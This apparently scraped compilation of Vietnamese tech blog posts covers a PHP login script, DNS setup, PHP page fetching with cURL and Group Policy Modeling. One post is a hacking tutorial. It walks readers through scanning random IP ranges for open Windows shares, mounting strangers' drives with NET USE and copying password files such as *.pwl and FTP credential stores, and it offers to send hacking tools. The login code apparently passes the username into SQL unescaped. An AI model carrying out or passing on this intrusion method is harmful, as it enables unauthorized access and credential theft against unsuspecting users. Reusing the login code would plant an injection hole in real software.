$password = md5( addslashes( $_POST[‘password’] ) );
// Lấy thông tin của username đã nhập trong table members
$sql_query = @mysql_query(“SELECT id, username, password FROM members WHERE username=’{$username}’”);
$member = @mysql_fetch_array( $sql_query );
// Nếu username này không tồn tại thì….
if ( @mysql_num_rows( $sql_query ) <= 0 )
{
print “Tên truy nhập không tồn tại. <a href=’javascript:history.go(-1)’>Nhấp vào đây để quay trở lại</a>”;
exit;
}
// Nếu username này tồn tại thì tiếp tục kiểm tra mật khẩu
if ( $password != $member[‘password’] )
{
print “Nhập sai mật khẩu. <a href=’javascript:history.go(-1)’>Nhấp vào đây để quay trở lại</a>”;
exit;
}
// Khởi động phiên làm việc (session)
session_start();
$_SESSION[‘user_id’] = $member[‘id’];
// Thông báo đăng nhập thành công
print “Bạn đã đăng nhập với tài khoản {$member[‘username’]} thành công. <a href=’index.php’>Nhấp vào đây để vào trang chủ</a>”;
}
else
{
// Form đăng nhập
print <<<EOF
<form action=”login.php?act=do” method=”post”>
Tên truy nhập: <input type=”text” name=”username” value=””>
Mật khẩu: <input type=”password” name=”password” value=””>
<input type=”submit” name=”submit” value=”Đăng nhập”>
</form>
EOF;
}
?>
4. Tạo trang chủ:
Tạo file “index.php” với code như sau:
<?php
// Tải file mysql.php lên
require_once(“mysql.php”);
// Khởi động phiên làm việc
session_start();
if ( !$_SESSION[‘user_id’] )
{
print <<<EOF
Bạn chưa đăng nhập! <a href=’login.php’>Nhấp vào đây để đăng nhập</a>
EOF;
}
else
{
$user_id = intval($_SESSION[‘user_id’]);
$sql_query = @mysql_query(“SELECT * FROM members WHERE id=’{$user_id}’”);
$member = @mysql_fetch_array( $sql_query );
print <<<EOF
Bạn đang đăng nhập với tài khoản {$member[‘username’]}.
EOF;
}
?>
Bài viết đến đây là hết, chúc bạn thành công!!!
Xâm nhập từ xa khi online
Thông thường một hacker trước khi xâm nhập máy tính, thường cố gắng cài một Trojan mở cổng để xâm nhập, nổi tiếng nhất là Trojan Back orffice.
Bài học này sẽ chỉ cho bạn làm thế nào có thể kết nối với một máy tính cài Windows thông qua Internet và có thể lấy thông tin của chúng.
Công cụ cần thiết :
Ðầu tiên là bạn cần là một chương trình scan gọi là Netbios scaner. Tôi dùng Legion hoặc Winhackgold ( Download ở http://www.hackerclub.com/ ). Chương trình sẽ scan tất cả các máy có mở chia sẻ file trên cùng một netbios.
Bắt đầu :
Sau khi kết nối vào mạng, bạn vào Start/Run rồi đánh winipcfg, bạn sẽ nhận được một địa chỉ IP mà ISP gán cho bạn mỗi khi bạn kết nối, nếu bạn kết nối bằng Modem thì số IP này sẽ thay đổi gọi là IP động.
Trong mục SCAN FROM của Legion bạn hãy đánh địa chỉ IP của mình vào. Ví dụ tôi có 203.160.11.48 thì tôi đánh trong Legion on là 203.160.11 thôi. Bây giờ ở mục TO của Legion bạn đánh 203.160.xx (xx là địa chỉ IP bất kì bạn đánh vào, bạn nên đánh số gần nhất với IP của mình, tôi chọn số 12).
Bây giờ ấn nút SCAN, Legion sẽ bắt đầu scan và cho tất cả các địa chỉ IP nó tìm thấy 1 – 254. Nếu bạn may mắn thì khi chọn một địa chỉ IP thì bạn sẽ nhìn thấy như sau :
Shared resources at \\206.11.11.42
Sharename Type Comment
———————————————-
A Disk Floppy
CDRIVE Disk C:\ Drive
DDRIVE Disk D:\ Drive
CDROM Disk CD-Rom Read Only
The command was completed successfully.
Hãy click vào địa chỉ IP đó với các lệnh của USE NET bạn sẽ có quyền kiểm soát địa chỉ IP đó.
Trong cửa sổ DOS-Promt bạn hãy sử dụng các lệnh sau:
NET USE [drive: | *] [\\computer\directory [password | ?]]
[/SAVEPW:NO] [/YES] [/NO]
NET USE [port:] [\\computer\printer [password | ?]]
[/SAVEPW:NO] [/YES] [/NO]
NET USE drive: | \\computer\directory /DELETE [/YES]
NET USE port: | \\computer\printer /DELETE [/YES]
NET USE * /DELETE [/YES]
NET USE drive: | * /HOME
drive Specifies the drive letter you assign to a
shared directory.
* Specifies the next available drive letter.
If used with /DELETE, specifies to
disconnect all of your connections.
port Specifies the parallel (LPT) port name you
assign to a shared printer.
computer Specifies the name of the computer sharing
the resource.
directory Specifies the name of the shared directory.
printer Specifies the name of the shared printer.
password Specifies the password for the shared
resource, if any.
? Specifies that you want to be prompted for the
password of the shared resource. You don’t
need to use this option unless the password is
optional.
/SAVEPW:NO Specifies that the password you type
should not be saved in your password-list
file. You need to retype the password the
next time you connect to this resource.
/YES Carries out the NET USE command without
first prompting you to provide information or
confirm actions.
/DELETE Breaks the specified connection to a shared
resource.
/NO Carries out the NET USE command, responding
with NO automatically when you are prompted
to confirm actions.
/HOME Makes a connection to your HOME directory if
one is specified in your LAN Manager or
Windows NT user account.
To list all of your connections, type NET USE without
options.
To see this information one screen at a time, type the
following at the command prompt:
NET USE /? | MORE
or
NET HELP USE | MORE
Sau khi xâm nhập bạn cần lấy các thông tin của IP này ! Hãy vào những cái có kiểu \program files\cutètp\tree.dat, \mirc\download, windows\*.pwl …
Chuc các bạn thành công.
Nếu các bạn gặp khó về tool thì hãy liên hệ với mình, mình sẽ send tool mới cho.
Hướng dẫn cấu hình, sử dụng DNS của everydns.net
Tuy nhiên không phải nhà cung cấp dịch vụ nào cũng đưa hết quyền quản trị domain cho bạn , nhiều khi đổi DNS hoặc point IP mới phải mất tiền nữa chứ, vậy thì giải pháp như thế nào nhỉ.Tại sao bạn ko đăng kí dịch vụ DNS trung gian qua http://www.everydns.net nhỉ.
1 Đầu tiên bạn cần phải chuyển name server của domain mình về DNS của everydns.net theo thông tin dưới đây
ns1.everydns.net
ns2.everydns.net
ns3.everydns.net
ns4.everydns.net
2 Sau đó bạn hãy đăng ký account tại everydns.net, việc đăng ký này là miễn phí hoàn toàn.
3 Đăng nhập vào everydns và add domain:
Domain khi đã add vào sẽ nằm ở menu bên trái, click chuột vào domain của bạn để có thế thêm sửa và xóa các record.
Tiến hành add các record cần thiết để chạy website:
Đầu tiên là A record:
Fully Qualified Domain Name: tên miền cua bạn
Record type: gồm có A , CNAME, MX va NS
Record Value: địa chỉ mà bạn muốn trỏ record của mình đến
Tiếp theo là CNAME record:
Để email có thể hoat động bạn phải add 2 record như sau:
1 . A record cho subdomain mail.domaincuaban.com
2. MX record cho domain của bạn:
Và như vậy bạn đã config xong cho domain của mình để có thế chạy tất cả các dịch vụ cần thiết như www, email, ftp,…
Chúc các bạn thành công!
WEBDESIGN PHP- Lấy thông tin từ website khác
Đôi khi trong lập trình web yêu cầu chúng ta phải lấy thông tin, nội dung từ website khác như kết quả tìm kiếm của google, cập nhật thông tin theo trang khác.
Trong bài này sẽ hướng dẫn cách sử dụng “file_get_contents” function và “CURL” của PHP để đọc nội dung từ website khác.
file_get_contents (K, P) với proxy server:
< ?
$context = array (
'http' => array (
'proxy' => 'hostIP:hostPort', 'request_fulluri' => true,
),
);
$context = stream_context_create ($context);
$data = file_get_contents("http://www.test.com",0,$context);
echo $data;
?>
file_get_contents không sử dụng proxy server:
< ?
$data = file_get_contents("http://www.test.com",0);
echo $data;
?>
CURL với proxy server:
< ?
$url = "http://www.test.com";
$ch = curl_init();
$timeout = 5; // set to zero for no timeout
curl_setopt ($ch, CURLOPT_URL, $url);
curl_setopt ($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt ($ch, CURLOPT_CONNECTTIMEOUT, $timeout);
curl_setopt($ch, CURLOPT_PROXY, IP Address);
curl_setopt($ch, CURLOPT_PROXYPORT, Port No);
$file_contents = curl_exec($ch);
curl_close($ch);
?>
CURL không sử dụng proxy server:
< ?
$url = "http://www.test.com";
$ch = curl_init();
$timeout = 5; // set to zero for no timeout
curl_setopt ($ch, CURLOPT_URL, $url);
curl_setopt ($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt ($ch, CURLOPT_CONNECTTIMEOUT, $timeout);
$file_contents = curl_exec($ch);
curl_close($ch);
?>
file_get_contens và CURL đều có cùng chức năng đọc nội dung từ một url, nhưng xét về mặt thời gian, CURL đọc nhanh hơn nhiều so với file_get_contents và có nhiều tùy chọn hơn trong đối số sử dụng.
Chúc các bạn thành công! |
Khi thực hiện bảo mật mạng sự đơn giản thường là một trong những tiêu chí đầu tiên được xét đến.
Một ví dụ khá rõ ràng đó là Group Policy. Các đối tượng của Group Policy (GPO) có thể được áp dụng tại đơn vị cấu tạo OU (Organizational Unit), các cấp độ trang và miền của Activce Directory, cũng như cấp độ máy tính cục bộ.
Khi một người dùng đăng nhập vào hệ thống, Windows sẽ kết hợp mọi Group Policy khác nhau được áp dụng cho tài khoản người dùng đó với những Group Policy được áp dụng cho hệ thống nơi người dùng thực hiện phiên đăng nhập. Mặc dù, ban đầu phương pháp này nghe có vẻ không tồi, tuy nhiên mỗi cấp độ trong hệ phân cấp của Group Policy chứa nhiều cài đặt giống nhau, đIều này có nghĩa là quản trị viên có khả năng triển khai các cài đặt đối lập của Group Policy.
Vấn đề không thực sự nằm trong bản thân các cài đặt đối lập đó. Windows sử dụng một nhóm quy định để xác định những cài đặt của chính sách nào được ưu tiên khi xuất hiện sự đối lập. Thay vào đó vấn đề nằm ở khâu xác định chính sách đang được áp dụng này khi mọi GPO khác nhau được kết hợp và chúng ta đang phải xử lý sự đối nghịch đó. Chắc hẳn chúng ta đã gặp phải những tình huống tương tự, trong đó các cài đặt của Group Policy phát sinh đang được áp dụng, và việc xác định vị trí của những cài đặt này rất khó khăn bởi vì cấu trúc của Group Policy đang sử dụng khá phức tạp.
Tuy nhiên, trong những tình huống đó chúng ta sẽ không phải gỡ rối các cài đặt Group Policy thủ công nữa. Thay vào đó có thể sử dụng một công cụ mới có tên Group Policy Object Modeling (GPOM) để gỡ rối các cài đặt của Group Policy một cách nhanh chóng và dễ dàng. Đặc biệt, công cụ này còn có thể giúp kiểm tra các cài đặt của Group Policy trước khi áp dụng chúng. Theo đó, chúng ta sẽ biết được những cài đặt sắp triển khai có đáp ứng được yêu cầu mong muốn hay không.
Chúng ta có thể sử dụng GPOM từ bên trong Group Policy Management Console (GPMC). Khi mở Console này, phải chuột lên Group Policy Modeling rồi lựa chọn tùy chọn Group Policy Modeling Wizard từ menu ngữ cảnh.
Hình 1: Group Policy Modeling trong GPMC.
Khi Group Policy Modeling Wizard khởi chạy, nhấn Next trên trang Welcome. Khi đó chúng ta sẽ chuyển sang trang Domain Controller Selection như trong hình 2. Lựa chọn miền muốn vận hành giả lập đối nghịch và lựa chọn tùy chọn Any Domain Controller Running Windows Server 2003 or Later. Ngoài ra, chúng ta cũng có thể lựa chọn một Domain Controller cụ thể trong miền được lựa chọn.
Thông thường, tùy chọn Any Available Domain Controller sẽ vận hành tốt. Chỉ trong những trường hợp các Domain Controller được kết nối bởi một kết nối mạng tốc độ thấp hay khi một Domain Controller gặp phải vấn đề mô phỏng chúng ta mới phải chỉ định một Domain Controller cụ thể.
Hình 2: Lựa chọn Domain Controller để thực hiện tiến trình giả lập.
Sau khi thực hiện xong và nhấn Next chúng ta sẽ chuyển sang trang tiếp theo. Trang này yêu cầu cung cấp một số thông tin về những đối lượng mà chúng ta muốn vận hành với tiến trình giả lập đối nghịch. Do các Group Policy có thể áp dụng cho nhiều đối tượng người dùng và máy tính nên chúng ta sẽ phải chỉ định cả hai loại đối tượng này để biết được các cài đặt của Group Policy sẽ hoạt động như thế nào. Cách khác, chúng ta có thể chủ định vùng chứa Active Directory lưu trữ các đối tượng người dùng và máy tính cần phân tích.
Hình 3: Lựa chọn đối tượng áp dụng các cài đặt của Group Policy.
Trong hầu hết trường hợp, chúng ta có thể loại bỏ các cài đặt này cho một máy tính hay một người dùng. Tuy nhiên, sẽ dễ dàng hơn rất nhiều nếu người dùng và máy tính được cấu hình theo cùng một phương pháp mặc dù trong những tổ chức lớn sẽ có rất nhiều vùng lưu trữ người dùng hay máy tính trong Active Directory. Trong những tính huống đó, hãy chỉ định tên phân biệt cho vùng lưu trữ thực hiện lưu các đối tượng người dùng hay máy tính muốn vận hành giả lập đối nghịch. Ví dụ, nếu muốn vận hành giả lập đối nghịch vùng lưu trữ người dùng trong miền Contoso.com trong hình 3, thì tên phân biệt của vùng lưu trữ đó sẽ là:
CN=Users,DC=Contoso,DC=com.
Tiếp theo nhấn Next, và chỉ định xem có muốn thực hiện kiểm tra để xác nhận rằng một kết nối Dial-up đang được sử dụng. Ngoài ra, chúng ta cũng có thể lựa chọn sử dụng một tiến trình vòng lặp. Cần lưu ý danh sách thả xuống của trang này. Do các GPO có thể được áp dụng tại cấp độ trang, nên chúng ta có thể sẽ không thu được những kết quả mong muốn nếu không lựa chọn chính xác trang Active Directory trong danh sách này.
Nếu không có đối tượng Group Policy nào được gán tại cấp độ trang này, cũng cần chú ý tới cài đặt của trang. Những liên kết trang thường cho thấy các kết nối tốc độ thấp giữa những phân đoạn mạng. Lựa chọn trang chính xác sẽ đảm bảo rằng những truy vấn kiểm tra sẽ thực hiện trên một Domain Controller trong trang cục bộ thay vì một trang từ xa.
Tiếp theo, chúng ta sẽ nhận được thống báo yêu cầu lựa chọn thành viên nhóm bảo mật muốn kiểm tra. Nhóm người dùng đã được thẩm định quyền (Authenticated Users) và nhóm Everyone đều được kiểm tra theo mặc định, tuy nhiên chúng ta có thể dễ dàng kiểm tra bất kỳ nhóm bảo mật bổ sung nào bằng cách bổ sung chúng vào danh sách này. Khi đã bổ sung các nhóm bảo mật vào danh sách này, nhấn Next. Hãy kiểm tra kỹ trang bản sao của trang này. Thực ra, trang bản sao cung cấp cho chúng ta lựa chọn chỉ định bất kỳ nhóm bảo mật liên quan tới máy tính nào cần kiểm tra, trong khi đó, trang trước đó dành riêng cho thành viên nhóm người dùng.
Chúng ta sẽ nhận được yêu cầu nhập bất kì bộ lọc Windows Management Instrumentation (WMI) nào muốn sử dụng. Thông thường, bộ lọc WMI nào sẽ được sử dụng cho cuộc kiểm tra tổng thể là không quan trọng, do đó chúng ta có thể bỏ qua trang này.
Sau cùng, Wizard này sẽ hiển thị trang kết luận Summary. Trên trang này chúng ta sẽ xác nhận lại mọi thông tin cấu hình đã thực hiện ở các bước trước. Nếu mọi thứ đã chính xác, click Next rồi Finish để hoàn thành tiến trình.
Khi đã hoàn thành, Windows sẽ tạo một vùng lưu trữ bên dưới vùng lưu trữ Group Policy Object Modeling chứa tên của người dùng và máy tính đang kiểm tra. Nếu click vào vùng lưu trữ này, chúng ta có thể xem các kết quả truy vấn như trong hình 4.
Hình 4: Kết quả các truy vấn.
Hình 4 cung cấp một số thông tin tổng hợp cơ bản. Ví dụ, chúng ta có thể thấy thành viên nhóm bảo mật nào đã được sử dụng trong tiến trình giả lập. Điều này rất quan trọng vì có thể có một vài nhóm cùng tham gia nếu một nhóm cụ thể nào đó không được chỉ định.
Tab Summary cũng hiển thị những Group Policy Object đã được sử dụng trong khi tạo chính sách hiệu quả. Cần chú ý tới chính sách đó vì nó cho phép chúng ta xác minh rằng nó sẽ đọc mọi Group Policy Object cần được áp dụng cho trường hợp này.
Nếu muốn kiểm tra những cài đặt chính sách hiện thời, tab Settings sẽ hiển thị những cài đặt chính sách đang được áp dụng và vị trí của chúng (hình 5). Tab Query sẽ cho chúng ta biết điều kiện được sử dụng để lấy những kết quả kiểm tra (như các cuộc kiểm tra đã được thực hiện trên những người dùng hay máy tính nào).
Hình 5: Các cài đặt chính sách đang được áp dụng.
Khi Windows tạo nhiều Group Policy Object, nó sẽ sắp xếp các đối tượng này theo một thứ tự nhất định, sử dụng phương pháp “những thay đổi mới nhất được ưu tiên” để khắc phục xung đột. Ví dụ, nếu chính sách cục bộ và chính sách cấp độ miền chứa những cài đặt đối lập, thì các cài đặt cấp độ miền sẽ được ưu tiên do chính sách miền sẽ được xử lý sau đó theo một thứ tự thay vì chính sách bảo mật cục bộ.
Trong hình 5, chúng ta có thể thấy nhiều chính sách khác nhau liên quan tới các cài đặt đã được liệt kê. Cột Winning GPO cho biết Group Policy Object nào đảm trách việc áp dụng những cài đặt đó. Cần hớ rằng đây sẽ không phải là GPO cao nhất trong hệ phân cấp này. Nó có thể liệt kê một Group Policy Object cấp độ thấp nếu nó áp dụng một cài đặt, và không có chính sách cấp cao hơn nào thay thế cài đặt cụ thể đó.
Chúc các bạn thành công!
|
|
|